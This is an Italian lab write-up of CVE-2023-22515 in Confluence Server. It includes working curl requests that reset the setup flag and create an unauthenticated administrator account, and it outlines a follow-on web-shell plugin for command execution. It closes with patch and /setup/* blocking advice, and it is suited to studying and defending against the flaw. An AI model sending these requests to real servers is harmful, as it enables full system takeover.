
CVE-2023-22515 è una vulnerabilità critica di Broken Access Control rilevata nei prodotti Atlassian Confluence Data Center e Server. Un attaccante, senza autenticazione, può riattivare da remoto il processo di configurazione iniziale del server e, tramite questo, creare un nuovo account amministratore, ottenendo il pieno controllo del sistema.
Alla base di questa vulnerabilità c'è una verifica insufficiente tra il meccanismo di binding dei parametri del framework XWork2 e la logica di gestione delle Action di Confluence.
Un attaccante può manipolare il valore bootstrapStatusProvider.applicationConfig.setupComplete portandolo a false tramite un parametro nell'URL. Questa proprietà è una flag importante che determina se Confluence ha completato l'installazione e la configurazione.
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>
Inviando la richiesta precedente, il server riconosce nella memoria che la configurazione non è stata completata. Questo non modifica il file di configurazione permanente (confluence.cfg.xml), ma consente di modificare lo stato a runtime e aggirare il controllo degli accessi.
/server-info.action trasmettendo il parametro bootstrapStatusProvider.applicationConfig.setupComplete=false./setup/*./setup/setupadministrator.action e crea un nuovo account di System Administrator.È stato predisposto un Confluence Server nella versione vulnerabile (8.5.1) utilizzando Docker.
atlassian/confluence-server:8.5.1docker-compose.yml (riassunto):
services:
confluence:
image: atlassian/confluence-server:8.5.1
ports:
- "8090:8090"
environment:
- ATL_DB_TYPE=postgresql
# ... DB 설정 ...
Per evitare problemi di dipendenze Python, ho scritto ed eseguito un PoC come script Bash utilizzando curl.
Flusso dell'exploit:
Reset dello stato di setup:
curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
Risultato: viene restituita una risposta di redirect HTTP 302, confermando che internamente lo stato di configurazione completata è stato annullato.
Creazione amministratore:
curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
-H "X-Atlassian-Token: no-check" \
--data "username=hacked_admin&password=p@ssw0rd123&..."
Risultato: tramite questa richiesta è stato tentato di creare l'account hacked_admin; successivamente, dalla pagina di login, l'accesso con tale account diventa possibile.
È necessario aggiornare immediatamente all'ultima versione fornita da Atlassian.
Se non è possibile applicare la patch, è necessario bloccare l'accesso agli endpoint /setup/* a livello di rete (load balancer, WAF, reverse proxy, ecc.).
/setup/*Un attaccante che ha ottenuto privilegi amministrativi tramite CVE-2023-22515 può passare alla fase di esecuzione di comandi di sistema (RCE).
Confluence consente agli amministratori di installare plugin (Add-on). L'attaccante può sfruttare questa funzione caricando un plugin dannoso contenente una Web Shell, ottenendo così il controllo del sistema operativo del server.
/setup/finishsetup.action (richiede il bypass della licenza), oppure si esplorano i menu amministrativi accessibili utilizzando una sessione esistente.Confluence Administration -> Manage Apps -> Upload App.jar contenente classi Java dannose/plugins/servlet/webshell?cmd=id) per eseguire comandi di sistema.Questo ambiente di laboratorio (Docker) non dispone di una licenza Confluence valida, quindi non è possibile completare la fase di configurazione iniziale. Di conseguenza, la richiesta di creazione dell'account amministratore è andata a buon fine (redirect 302), ma l'accesso successivo al menu dei plugin e l'esecuzione effettiva della RCE sono stati limitati. In un ambiente operativo reale, la licenza è registrata, quindi la RCE è immediatamente possibile senza queste restrizioni.
CVE-2023-22515 è una vulnerabilità estremamente pericolosa che consente di ottenere privilegi amministrativi senza autenticazione. L'attacco è possibile semplicemente manipolando un parametro URL, il che rende il livello di difficoltà molto basso. Le organizzazioni che utilizzano queste versioni devono applicare immediatamente le patch o le misure di mitigazione.